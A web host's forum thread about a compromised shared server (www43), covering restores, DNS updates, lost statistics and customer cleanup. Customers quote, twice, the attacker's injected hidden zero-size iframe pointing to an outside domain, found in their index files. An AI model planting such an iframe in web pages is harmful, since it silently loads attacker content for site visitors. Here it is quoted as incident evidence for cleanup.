www43 has been compromised tonight. We're moving user backups to a new server and restoring, but it will likely be a couple of hours till everything is back to normal.

We'll update here as the evening progresses.

If you have a Joomla / Mambo site, it better be upgraded IMMEDIATELY - else it's liable to be suspended.

Joe

Some sites have been defaced so as a security precaution HostPC is moving sites to a new server. We expect the down time to last a couple of hours.

A website on this server has been compromised. If you could, please change your nameservers to ns48a.hostpc.com and ns48b.hostpc.com, we will get your files restored as soon as we can.

SSH on all servers will be turned off for the time being.

Ryan

Status Report:

We've started the restores to a new server. We also identified where the attacker got access, and it has been blocked.

Restores are going alphabetically. DNS has been "hotwired" from the old server, to the new.

If you were on www43, please be sure your DNS is updated to:
ns48a.hostpc.com
ns48b.hostpc.com

As the sites are being restored, because we hotwired, they'll come back online, but you MUST update your DNS. This is done where you registered your domain name.


Updating DNS at enom.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_enom.html)
Updating DNS at GoDaddy.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_godaddy.html)
Updating DNS at registerfly.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_regfly.html)
Updating DNS at dotster.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_dotster.html)
Updating DNS at 123-reg.co.uk (http://www.hostpc.com/community/../onlinedemos/dns/dns_123reg.html)
Updating DNS at NameCheap.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_namecheap.html)
Updating DNS at NameBargain.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_namebargain.html)
Updating DNS at NetworkSolutions.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_netsol.html)
Updating DNS at Register.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_register.html)
Updating DNS at 000domains.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_000domains.html)
Updating DNS at ItsYourDomain.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_itsyourdomain.html)
Updating DNS at DomainSite.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_domainsite.html)
Updating DNS at DynaDot.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_dynadot.html)
Updating DNS at StarGate.com (http://www.hostpc.com/community/../onlinedemos/dns/dns_stargate.html)
If you registered your domain at HostPC- the link is: http://www.hostpc.com/domains

Thank you

is there an email going out to all the users to change their dns?

We expect the down time to last a couple of hours.

Could we have a status report on this?

Edit: Still seem to be getting database errors...

Thanks,

Peter

If you're still having issues with this, open a helpdesk ticket... we're in cleanup mode now fixing a couple individual issues, but by and large, everything's done.

We'll be able to better help you thru the helpdesk.

Thanks

OK, thanks, will do.

I was on www43 and I am now up an running on www48. I am not (and never have) run Joomla but I think my data files may have been affected.

I am seeing that every index.html file on my site has been modified to include a line:


<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


I found a reference to this URL that has been inserted in all of my index.html files here:

http://forum.joomla.org/index.php?topic=86820.msg441212

I am thinking that when the Joolma install that someone had was exploited that it added this link to all the files on the server... including mine.

Does anyone have any more info on this? I am in the process of manually cleaning up my files.

I was on www43 and I am now up an running on www48. I am not (and never have) run Joomla but I think my data files may have been affected.

I am seeing that every index.html file on my site has been modified to include a line:


<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

I found a reference to this URL that has been inserted in all of my index.html files here:

http://forum.joomla.org/index.php?topic=86820.msg441212

I am thinking that when the Joolma install that someone had was exploited that it added this link to all the files on the server... including mine.

Does anyone have any more info on this? I am in the process of manually cleaning up my files.
Yes,
That line was added to everyones index*.* files. It was a part of the hackers hack of the server.


Dan

I am seeing that every file on my site named index.html and index.php has been modified to include this hidden IFRAME. Is there an easy way to do a global search and replace on these files? Tracking them down in the DirectAdmin file manager is a bit tedious.

I would also advise anyone that was on www43 to check their files. You may also find that all of your pages have been tagged by this attacker.

I am seeing that every file on my site named index.html and index.php has been modified to include this hidden IFRAME. Is there an easy way to do a global search and replace on these files? Tracking them down in the DirectAdmin file manager is a bit tedious.

I would also advise anyone that was on www43 to check their files. You may also find that all of your pages have been tagged by this attacker.

Same corruption on my site. Not sure how to track them all down without having shell access. Most of my sites were dynamic and as well as tagging the index.php files, most of my databases disappeared.

The best thing would have been if a restore could have been done from an uncorrupted backup - but I guess I'm asking too much. Once again, the lesson is to look after your own backups (and make sure you download them, all backups I had sitting on the server vanished).

I ended up doing a backup and downloading it. I then uncomressed the backup and did a global search and replace looking for the www.o00o.info url. I then uploaded just the changed file using ftp.

I guess I am lucky that only my html was tagged.

Thanks soooo much for finding this and bringing it to everyone's attention! Luckily it only affected one file for me and it was easy to clean up once you did all the legwork.

I thought all database installations were just removed as a precaution when we were moved? (note my data is all still there, and it wasn't presently under urgent need) ... I've ocassionally had a survey running under PHPesp and if things had gone down during a time that was in use ... I'd have been very unhappy

I too had the o00o.info stuff in a few index files

IMPORTANT:

We apologize, but the old AWStats history was lost when the old server (43) was compremised. We had planned on moving the stats over to the new server, but due to techinical problems after moving all the accounts, we lost everything on that server beyond the daily backups of the user sites.
AWstats data was held in a common directory above the users web account structure and thus was not included in the daily site backups. We now see the folly of this and are taking steps to move that data into the individual clients /log directory going forward. This should be completed in the coming weeks.

You will probably get an error message if you try to access the stats. Just log into your DA account and reinstall AWstats.

Webalizer stats should still be intact since they are held in each individual acct.